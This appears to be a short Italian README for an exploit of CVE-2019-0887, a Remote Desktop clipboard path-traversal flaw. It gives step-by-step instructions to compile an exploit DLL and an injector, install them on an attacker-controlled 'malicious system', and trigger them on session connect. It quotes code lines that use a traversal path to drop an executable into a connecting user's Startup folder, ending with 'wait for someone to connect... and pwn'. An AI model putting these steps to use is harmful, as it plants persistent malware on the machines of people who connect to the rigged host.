
exploit per CVE-2019-0887
Compila il CVE-2019-0887, rinomina in winhlp.dll
Compila Install_Hook, rinomina in hook.exe
attenzione, devono essere compilati con x64
Mettili nel sistema malvagio in questo modo
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
se qualcuno vuole cambiare il percorso, ecco il punto
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
Forse usa taskschd.msc per creare un Piano di Attività, imposta un Trigger "Alla connessione alla sessione utente" e imposta il percorso del file di hook.exe.
Aspetta che qualcuno si connetta al mio sistema malvagio, copi qualcosa, e pwn...
Suggerimenti: Perché non usare DLL hijack?